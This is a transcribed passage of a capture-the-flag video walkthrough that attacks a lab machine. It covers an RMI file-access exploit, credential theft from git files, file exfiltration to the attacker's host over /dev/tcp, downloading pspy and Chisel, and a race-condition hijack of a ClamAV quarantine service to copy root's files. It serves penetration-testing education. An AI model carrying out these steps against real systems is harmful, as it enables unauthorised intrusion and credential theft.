created the class. Yeah, that's right. Jar CFM. So we're going to create exploit.jar. And then give it the manifest. And then every directory. Okay, so we have it. So java-jar exploit. Cannot find or load this. We have exploit.class. Package com hosting. I think that's fine. Let's remove exploit jar. Move exploit class into com HTTP hosting RMI. Let's create that jar. Java-jar exploit. There we go. And yes, it does work. So our code is working. It's just when we have it decompiled, it does not, which I don't know exactly where that error came from, but yeah, that is not intuitive. So we probably have to revisit how we decompiled this app if we really wanted to. I'm guessing like using JAD or something on each class may be better, but at least we see that. So let's just fix up this code. I think it's going to be easier if we work with this and then just recompile. We just lose the ability to do run, which is annoying. So where are we? What do we want to do? Well, we have this. If we do 2 dots, we know at least we're in that. So I guess we should create a buffered reader. So let's comment all this stuff out. So we have a proof of concept there. Now let's do final buffered reader like this. And let's say while true, and we can read a command off of it. Let's get rid of a lot of this. Okay, so we have to probably do import statements because it can't resolve these. So let's do import buffered reader, input streamer. Okay. Why can't that? Unhandled exception. So I guess we put this in a try statement. Catch. That's fine. Let's do proper indenting. Okay. Let's see what this looks like. Enter a command. If we do test, we don't get anything. If we do exit, it exits. So we have a menu. So let's do, instead of enter command, I like a caret like that. And then we're going to have things like ls and then a directory, right? So we have the command here and we want to split it. So let's see, split string on first space. Does it tell me how to do that? String parts 2. Awesome. I wonder if we, is this, let's see, cmd args. Can that do it? I wonder if I say string like that. No. I was trying to assign them both at the same time. We can call this split and then say cmd split 1 arg like that. And then say if cmd equals exit break. Let's just do a switch statement. cmd case exit break case ls, and let's do print listing files in. Let's see what this looks like. Run, do nothing, that's fine. ls/home, there we go. So we do have our argparse working fine. So what else did we want to do? We want to be able to print files. So we'll do case cat. And then we want to be able to write a file. Okay. That should be fine. And at this point, we can no longer debug our code, which is going to be annoying. So hopefully we write this correctly. So let's grab some of this. Let's see. Here's the loop, the vhost. We don't need that. We don't need the list. Do we need this try here? Is it going to error if we don't? It does, unhandled exception. Okay. So here, we can do that list. And I screwed it up because I deleted the code that had it. We have it in this one, right? Whoops. Exploit.java. This is what I want. Okay, why is this erroring? Cannot be resolved. So the issue here is when we're calling service here, it's in this try block, and it's essentially in these curly brackets. So when it leaves this variable gets freed and not there. Free is probably the bad term. But we have to declare the variable outside of the brackets. So let's do a file service svc is equal to null. And now we say, or now it's saying it's duplicate variable because we declared it again. So if we just remove this file service call and do svc, it works. So I think that is good here. So we want to be able to read files. So let's do svc dot, let's see, what is the function to get a file? It's probably get file. I wonder what the difference between two. Guessing we have to call this one because we want to give it the vhost and the argument. And let's see, this returns probably bytes. String 2, abstract file. So is it file, abstract file like this? File? Let's see. Cannot be resolved. Let's see. Is there a different thing? Let's go back to the client wrapper. That's not what I want actually. File service. Maybe view. That'll be bytes. I'm guessing we give it one parameter, it is just going to do, like, it's going to try to get the vhost by itself. And if we give it two, it won't. So let's say byte b is equal to view like that. And then we want to print the byte. Okay. And then we want to write the file. And this is also going to be extra arguments. So let's see, how do we want to call this? We have to do another split because we have the file name and then we have the data, right? So we can do string split 2. I'm horrible with naming things. Okay. And then vhost data get bytes. I think that'll work. So I think we have all the code. So let's go back here and copy the Java. So cp HTTP registry2 source hosting was it webinf classes com HTTP hosting RMI. Where is this file? Exploit here. Then we wanted to give it the package. So package com HTTP hosting RMI. I think that's all we did. Let's see. Java C. We compile it. It compiled just fine. Let's copy the class com HTTP hosting RMI. And then we do the jar command. Jar sieve fm like that. Java dash jar exploit ls. Can we do home? No, because when we did this ls, we did not specify any directory. So let's see. V hosting RMI exploit Java. And how do we do this? We can probably just say plus args or arg Java C, the jar command, the copy command, the jar command, java-jar ls/home. We have an error somewhere. ls home developer. That is ugly. But we can get user.txt. ls home developer SSH. Let's see. I wonder if there's a different thing we can do here. How are we looping? We do that. We do file get name. I really have no idea why it's erroring. Let's cat etc passwd. No such file. So we have to go up 2 directories. So everything we're doing, we get an out of bounds error at the end. But we can see it is indeed working. So we also called it write. So let's write to dev shm test.out. Please subscribe. Connection refused. That's not good. Let's try this again. Write dev shm test.text. Please subscribe. File not found because we have to do 2 dots. Yep, 2. Right. Do a few more for good measure. There we go. So if I cat this, let's see if it wrote. It did. So let's make an SSH key and see if we can upload it to developer. So SSH keygen, we'll call it developer -f cat developer.pub. We will copy this key, right, go up a few directories, then home, developer, SSH, authorized keys, and put this here. sh-i, developer at registry hosting HTTP. Cat etc host. We can just do 10.10.11.223. That did not work. Let's see. What user are we? Let's see. Cat proc self environment probably will get it. Does that get username? It should get home directory, which will get the username. Cat proc self environment. It is username home RMI service. So we're not developer. cat home RMI service SSH IDRSA. Do we have a key? Connection refused. So it looks like the server hung up on us. Do it again. No such file. So we're going to go back to that write command. I really hate that my tab autocomplete thing isn't working. Or not tab autocomplete, but left and right arrows. Home RMI -service.sh authorized keys. Let's grab this. Not found. Do we have to make the directory? Let's see, ls home. Oh, there's only a developer. Proc self environ. I wonder if we need to create this directory. RMI service. There's a create directory, right? Case make dir. Before we do this, etc passwd again. RMI. So if we put an SSH key, we don't have a shell. So let's not waste all that time doing that. Instead, let's see something real quick. ls dev shm connection refused. If we ls this, we have dev and test.txt. So what I want to do is write dev shm.test to create a hidden file. And then we ls this. And it will show us hidden files. Home developer. Okay, so we can go in his home directory, and there was a git credentials. So let's go to this. I guess I just missed it when we were viewing his directory, and since we viewed his directory, I thought we were that user. Home developer git credentials. Oh. How am I doing ls? So that's interesting. If we call ls on the file, I think it actually goes into it. We have a credential right here. So this is probably going to be developer's password. They have this GitHub name probably, but etc passwd. Yeah, that is the case. That if we use ls and specify a file, it cats the file. That must be a weird Java thing. I bet if we did the cat command on a directory, does it do the same thing? No. It just says it is a directory. Sometimes in Java, when you open a directory as a file, it just behaves as ls. So that's why I thought that could be the case. But we do have a potential password. So let's try developer at 10.10.11.223. paste this in. Did I do it correctly? Make sure we copied it all. It begins with QY and ends with J9. We forgot the last character there. Paste it, and there we go. We have got developer on registry, and we can get user.txt. So the first thing I generally like doing is always running a psef forest, and then looking at what's running on the box. So I'm going to skip all the services, and looking at the first thing that really sticks out is we have root, a cron running. It's looping 6 times, and each time it's going to execute bin bash, and then run this shell script, Tomcat app reset.sh, then sleep for 10 seconds. We can currently see the script is sleeping for 10. We don't have the contents of the script. If we ran something like pspy, we could see each thing the script is running, because I'm guessing whatever lines it's running is like probably seconds or milliseconds long. So unless we're running a PS on that millisecond, we won't see it. Most likely we'll see it on sleep 10, because that's where the script spends most of its time, sleeping. So let's go down. What else do we see? We have CLAM AV running. That is definitely unique. What else? That's nginx. We have our SSH session, a Docker session. This is probably going to be like the registry and, or these are proxies. So this is setting up the port forwards to each of the containers, right? So that's forwarding on IPv4 and IPv6. That's the Docker registry, and that's the Docker Auth server. Down here, it looks like this is going to be running, I'm going to guess the website, because that's what we got a shell on through the YSOSERIAL thing doing a RMI payload. So that's where we see our shell. We have MySQL, a registry service, and then down here we have opt-registry.jar, which we haven't met that jar file yet. It is running as the RMI service user. So this is the one we have just exploited. So we can now grab the source code to that jar file. The other thing interesting is it's running as a super high PID, right? We can see our PID right here. It is a sequential thing. So this indicates the service is being restarted. And we can verify that by going in proc and then that PID. Oh, it's already dead. So we have a new one, 19755. So if we do 19755, we do LSLA, we can see this process was just started. If I run a date command, we see it's 2203. Let's go to like CMD line, 2203. So that's when this process was created. So we know this opt-registry.jar is being restarted for whatever reason. I'm going to go on a guess right now and think it's that cron. If I do a date here, we can see it's going to go to a new minute, and we can see if this actually dies. So if it's being restarted every minute. Do LSLA, it's still there. So I'm just going to keep that in like the back of my knowledge that this process is restarting. We don't know what frequency or how it restarts. We just know it's restarted recently. So I'm going to grab registry.jar. So let's do ncat lvnp 9001 registry.jar cat registry.jar, pipe it over to dev tcp 10.10.14.8 9001. We have now sent that file. So what else do we want to do? We can also run a pspy, because I want to know exactly what was in that cron. So let's do locate pspy. Do I have a copy? It looks like I do. If you don't have this, you can just probably grab it off of GitHub. So let's copy this, make dir dub cp pspy to dub. Start up a web server, cd dev shm wget 10.10.14.8 8000 pspy 64. What was that file? Oh, we have the small. chmod plus x. Doesn't have the glibc thing, so we don't want the small. Locate piece by 64. Let's copy the non-small version. Stand up the web server. Do a wget again. chmod. Run it. And we can see every process. It's not actually going to catch it every time. I'm going to let it run for a few seconds and we'll see if we get lucky. We do. So we see the reset.sh, it's doing check host. So we don't know exactly what this check vhost.sh is, or this binary. We could look at the binary and reverse it if we wanted to. But we can see it's executing quarantine, which then eventually goes into this quarantine.jar. So we have another jar file. So let's cat this file to dev tcp 10.10.14.8 9001. Let's nc lvnp 9001 quarantine.jar. And again, you're not always going to see that as reliably as we just did. A better way to look at it is using the -f flag. You may want to add a process flag as well. I think since I just did -f, it's not going to show me new processes, but every time a file system operation happens that I have access to, it's going to tell me. We can see it right here. And I'm guessing we'll see it load that quarantine.jar. It's a bit more noisy, but we can see, there we go, it opened, and now it did a access, right? So that's another way we can see it through piece by. Both the process and the file system is definitely handy to look at. The file system does catch things that just run for less time. So let us now look at all the source code. So opening up a new pane, I'm going to get rid of this JD-GUI window, and I'm actually going to switch programs. We're not going to use JD-GUI for this. I'm going to use something called RECAF. And this is normally my go-to for decompiling a jar. I don't think it works on WAR files, so that's why I did not use it before. But this will have the nice benefit of if we want to make a modification, we can just do that inline. We don't have to go recompile, which I absolutely love. So let's download the big jar file with dependencies. And then we can java-jar recaf. Okay. And then we can just open the file. So we'll do file load. Let's look at the registry.jar. Is quarantine and dub? It is. So let's look here. Can we change the size? Control wheel's not working. Config 16. I think I already have it as big as it goes. There's probably a Java parameter I can do to make it bigger, but I think we'll live with this. So looking at this code, it doesn't look too interesting. We just have it listing on 9002, binding, and then doing this file service thing, which we already saw. But it does have something new. It has a quarantine service, and we don't know about this one. So if I go over to the quarantine directory, we can take a look at the configs, or files, I should say, the code, where the quarantine service is at like implementation or impl. So we have it creating a config, and the default one creates this object. We have root quarantine, then we have the file service sites directory. So we don't know where it gets this from. Then localhost 3310.1000. So we don't know exactly what all these fields are, but if we look through this, it may eventually tell us. So that's where it's getting configuration. We don't know that. So let's see. Here we go. The first parameter is the quarantine directory. Then we have the monitor directory. Then we have the CLAM AV host, the CLAM port, and the timeout. So it looks like the default timeout is going to be, I'm guessing that's millisecond, so probably 1 second. So all this service is doing right now is, I guess, sending out a config. So when they access this, they run the quarantine service thing, they get a output of this quarantine configuration, that points them to localhost and gives them some files, right? So we could easily change this to say, hey, scan/root and place all the files in new file, and we'll place them in, let's say, dev.shm. Then I'm going to set the scanner to be 10.10.14.8, and then say the port, we can do 3310, and I'm going to do the timeout to, we can leave it at 1000. So if I hit Control S to save, and then we do a file export program, we can say this is registry modify.jar. Save the file. And we see modified classes 1. So if I go here, ls, we can see registry modify.jar. And when we run this, it probably won't run because I think I'm still doing Docker to do YSOSERIAL. The port's already in use, but it's standing up on port 9002. So let's send this over to our box. I'm going to move this registry modify.jar to dub, and let's just call this ip.jar so we don't have to type quarantine every time. And then go back to our shell, and let's download this. So we'll do wget 10.10.14.8 port 8000 ip.jar. We have to stand up the web server. Okay. So if I try to run this ip.jar, we also get that port in use. But remember what we said. Every some minutes, I guess it doesn't show in order unless I do that. Every some minutes, this service is going to restart, which is running registry.jar. So if that's restarting, there's a chance that we can spin up our registry.jar in the time that goes away, right? So I'm just going to do while true do, and we're going to say java-jar ip.jar and pipe all error messages to dev null, and then done. So now it's going to just keep trying to load. If we didn't hide the error messages, you'll see it just spammed the output, right? Because we're just constantly running this program. So we're trying to win the race so we can listen on that one port. We can also stand up our listener on 3310. And while we're waiting, let's just go back over to RECAF. And we can say file load, and then load the quarantine.jar to see exactly what happens. So if I go to main, let's see, it's doing client.scan. So here's client, we have scan. It's going to get documents, then it's going to do a scan and use CLAM AV to scan it. And if it gets the status and let's see, there's a potential risk, it's going to apply quarantine, get the file path, and then quarantine the file, which copies it to that quarantine directory. And CLAM normally runs as like a set UID bit, so the AV is going to be running as root. So the whole idea of what we're doing here is standing something up so the CLAM server, well, it reaches to us as the CLAM server, and we're just telling it everything is malicious. Actually, we're just going to probably cause an error, and for some reason, it's still going to apply the quarantine thing. I guess maybe when netcat times out, it still failed, because this failed is probably if it has a virus or it gets detected or something like that, right? We're just hitting this fail statement. So do we have anything yet? We have bound to 9002. What service was that? Was it 3310 or 3301? I don't know. NCLVNP 3301. Let's just listen on both of them to see if anything comes. And we probably should have ran it with a -k, because I think every single file it scans is going to come back to us. So I'm going to switch and put a K, and that's going to keep open. So what that means is after a connection comes in and dies, the netcat stays open, right? So if I do nc localhost 3310, we have the connection open, do it again, and it just stays open, right? So we are running there, but we're not getting any hits. So we may have an error in our quarantine file. So let's load this again. Let's go to ip.jar, go to classes. Let's go to quarantine service implementation. And let's see. We have the default config pointed to root. Then the quarantine directory is to dev shm 10.10.14.8 port 3310. Oh, we're getting things. So we can see it has now scanned all the files in dev shm. So I think we reversed this. We wanted to scan root. So we probably quarantined dev shm and copied it over to root. So we made these parameters backwards. So let's do dev shm and root. That makes sense. Yeah, we definitely did that backwards. So let's export program to www ip.jar, save, replace. And that's why I like the RECAF tool. So let's Control C out of this, W get the new one. Let's just clear that. And then we want to do the while true loop. And we have to win that race condition again. So this is probably going to go on for a couple minutes. So I'm going to pause the video, resume. It'll probably be 5 minutes or so, but yep. Okay, it has now bound to 9002 and we are waiting for it to start connecting back to us. So I'm going to pause the video again and we'll resume. Oh, nope, I don't have to pause. So we have now started scanning. We can see every connection and it seems to be taking maybe 1 second per connection. So I wonder if we change that timeout, if it would go any faster. I bet it would. We did see a ID RSA. I'm scared. I want to Control Z this, but I don't know if it's a smart idea because the RMI server will go down. Maybe. Huh, nope, it looks fine. So let's go to dev shm, dev shm, and oh man, we have a lot of files. Find.-name ID RSA, find.grep ID. I guess I should put a star before it. But we do have this RSA key. Permission denied. That is only owned by root. So it is copying with the permissions. And even though, well, we don't even own the directory, so I don't think there's any way for us to take this over. So we're just looking at other files that get exfilled, I guess. I guess the best way we'll do this is find .-type f, and we can see all the files. And eventually one may stick out. We do have that check vhost, but we'll see if we can actually view this file. So ls-la, we could. So if we want to, all that script is doing is running user local sbin vhost manage -m quarantine. We could also add the -readable flag. So that would just show us the files that we can read. And we do have a root get credentials. So if I cat that file, we can see admin and another long password. If I copy this, su, and we got root. And that is the box. I am curious though, if we can speed this up, right? Because this scan is taking a while. I think it does it every second. Maybe it's sending us the file, but what I want to try is changing this timeout, and then we'll do the beyond root, which will just be showing the proxy. So I'm changing this to 100 milliseconds. Let me make sure ping 10, 10, 11, 223. We're at 90 milliseconds. I just want to make sure I'm not saying the timeout where it can't even reach my box. I'm going to do 150 to be safe, or do 200. So we'll see if that goes any quicker. I'm not sure if it will. I know if you created a Python program, responded, and closed the socket, it would definitely go faster, but I don't want to do that right now. If you want that, you can also go to OXDF's write-up, and he did it that way. Let's see, we can kill this program. wget, do we still have it listening? We probably want to remove it. Then while true, let's clear this so we get a better thing. Start the loop. And let's see, can I SH as root here? 10, 10, 11, 2, 23. No, we'd have to do developer then root. SU bs-ef forest. I'm just doing this to speed up winning this race, right? 12258. So we can just kill that PID. Did I win the race and then kill myself? Is that what just happened? That's embarrassing. One, 4, 9, 6, 8. I guess that's not smart. I should just set up a second shell, but I'm just going to let this run, pause the video. And we have a connection back. We can see it is going a little bit quicker. I think it was taking 1 second per file, and now it's probably taking much less than that, right? So changing the timeout does fix it in order to get it going quicker. So with that being said, let's just go over and hop into the Beyond root. I'm just going to kill both of these and thinking, I guess we'll run Chisel. We don't need this, right? So with the RMI exploit, do I still have it? How did we do it? We used YSOSERIAL. Let's see, netcat. Oh no, this is after YSOSERIAL. This is this code, yeah. So when we're connecting, we specified registry.webhosting.acb and used the IPv6 because that's where it was listening, right? If we wanted to, but if we couldn't access it over IPv6, we still had a shell on the container down here. So we could run Chisel here and do a type of port forward. We could also just upload the jar file to this box and then run it that way, but that takes the fun out of it, right? I never like uploading my payloads to my target if I can avoid it. Using some type of proxy is generally better. We can get rid of that. And the actual exploit we use is this. So we're not going to make any modifications to the exploit.jar file. All we're going to do is execute it with some functions. But before we do that, we have to stand up Chisel. I think I have Chisel already. Let's just do locate Chisel and op Chisel Chisel. That's what I want. So go back and dub cp Chisel here, dev shm, wget 10 10 14 8 8000 Chisel. Okay, so we have now downloaded Chisel. So now let's run it. Chmod plus x Chisel. Typoed here. Chisel server. Let's listen on port 8001, and we need reverse. Okay. And we can do, I'm going to hate this. Let's see. Socks 5. I'm going to stand up all the proxies first. So let's do /chisel and then client 10.10.14.8, 8001. And then the first thing we want to do is forward to localhost. It goes on 9002, 127.0.0.1, 9002. And I'm going to show this fail, right? And it's going to fail because, again, this is a mapper. It's going to redirect us to a different port. And when it does that, that's when it fails. We could forward that port as well, but instead the easier way is just to do a socks. So I'm going to do both of those. And I was slightly upset because as soon as I control C this, I'm going to lose this shell, and I just killed the YSOSERIAL payload that helps me get this shell. So if I screw up, it is quite a bit of work. So hopefully we do this right the first time I can show everything I want to. So I'm going to run this. Permission denied. I guess we can't execute out of dev SHM. So let's move it to temp. And then run this command again. Client can't listen on 9002. Oh, because we have to specify that as reverse. R 9002, 127.0.0.1. No, do we? I think so, yeah. There we go. So now if I do a netcat on localhost, it's going to go to port 9002 of the target, which is the RMI mapper port, right? So in theory, you would think if I go into my host file again, and we change this to go to the IPv4 address. Actually, we want to go to 127.0.0.1. Okay. So if we go to localhost 9002, it's going to forward through chisel. Where is the exploit.jar that we have? Let's just do find -name star.jar. Period comes after find. grep.jar, easier way. I could have swore we called it exploit. Source exploit, there we go. Java-jar exploit ls/home, or yeah, we can do ls/home. And we get connection refused. So let's open up Wireshark real quick and look at this. So sudo Wireshark. It's going to be hard because both endpoints are 127.0.0.1, but thankfully we still can debug this. Where is loopback? ls/home. So we're going to see it connect. And remember, three-way handshake, so it starts off with a SYN. So this is us connecting to 9002. We do a lot of communication. And then right here, we have it closing the connection. And we see we send the SYN, and it's two high number ports, 6610, 41163, and it just closes. And this is because the RMI server over here directs us to a different port. I don't know how to view that in Wireshark, but if we had forwarded, I want to say it's going to 4163. So if we forwarded this port as well in the chisel, then it would connect, right? This is the RMI mapper. You can tell this is a second connection, again, because this is the SYN packet. That's how the three-way handshake starts. So that's why that fails. But if we wanted to, we could just say to use a proxy. And you've seen the code. We have no proxy awareness in this, right? But Java is somewhat magical. I know Golang a lot of times just recognizes the HTTPS proxy variable. You can set stuff there. To do it in Java, you just do a -d, and then socks proxy host is equal to 127.0.0.1. And then again, we have to do the proxy port is equal to, I think it opened on 1080. I think that's what Chisel uses. Sudo v etc host. And we want to change this. We can probably still go through 127.0.0.1. I think that'll work because I'll go through the proxy, then hit it. But it could also be 10.10, whatever, because it can hit either or. So if we run this ls/home, and it works again. I can't code Java, so that's why you have the errors there. But we tried to run that before. We got the TCP connection denied. Now we are just getting developer, right? If I did ls, or we can cat a few / slashes because I forgot to do that, etc pass wd, we get the file, right? So that is how you can specify the sock stuff on this. And if you really wanted to, we could show etc host, put this away from 127, because again, it's going through the proxy. So it doesn't matter which one. This will just be proof it's not going through the local port forwards, right? So cat etc pass wd, and it works. So like magic. So hopefully you guys enjoyed the box. Take care, and I will see you all next time.